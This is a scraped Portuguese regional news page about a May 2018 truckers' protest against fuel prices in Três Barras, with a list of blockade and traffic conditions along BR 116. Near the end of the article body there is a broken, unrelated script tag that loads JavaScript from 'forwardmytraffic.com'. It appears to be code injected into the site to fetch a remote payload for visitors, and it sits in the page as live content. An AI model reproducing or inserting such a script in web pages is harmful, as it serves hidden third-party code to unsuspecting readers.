InícioCidadeMotoristas Iniciam Protestos em Três Barras

Motoristas Iniciam Protestos em Três Barras

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

Motoristas iniciam o manifesto contra o aumento dos combustíveis, na cidade de Três Barras. Iniciaram o manifesto no inicio da tarde na SC-303 entrada de Três Barras. Parabenizamos os motoristas que participam do manifesto, todas as cidades juntas manifestando terá um grande impacto nacional, cada município fazendo sua parte venceremos a luta contra esse governo que impõem valores abusivos em todo e qualquer imposto cobrado.

 

 

 

Cidade que deram inicio aos manifestos no dia 22/05/2018

 

– BR 116, km 7 em Mafra: ambos os sentidos liberados sem registro de lentidão. A paralisação de veículos (caminhões e carretas) em  acostamentos ė de aproximadamente 3 km em cada sentido.

– BR 116, Km 54, em Papanduva: ambos os sentidos liberados para veículos leves, ônibus, veículos de emergência e caminhões com carga viva.

 

BR 116, km 138, em Santa Cecília: ambos os sentidos liberados para veículos leves, ônibus, veículos de emergência e caminhões com carga viva. Veículos de carga estacionados em faixa de domínio. Não há registro de lentidão.

 

BR 116 – km 245 em Lages: ambos os sentidos liberados sem registro de lentidão. Veículos de carga estacionados em pátio de posto de combustível.

 

BR 116, km 178 em São Cristovão do Sul: ambos os sentidos liberados sem registro de lentidão. Veículos de carga estacionados em pátio de posto de combustível.

Paraná – BR 116
km 191 em Campo do Tenente: ambos os sentidos liberados sem registro de lentidão. Veículos de carga estacionados em pátio de posto de combustível.

 

– km 127 em Fazenda Rio Grande: queima de pneus sobre a rodovia, sentido norte sendo desviado por marginal.

 

Rodovias com manifestação

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.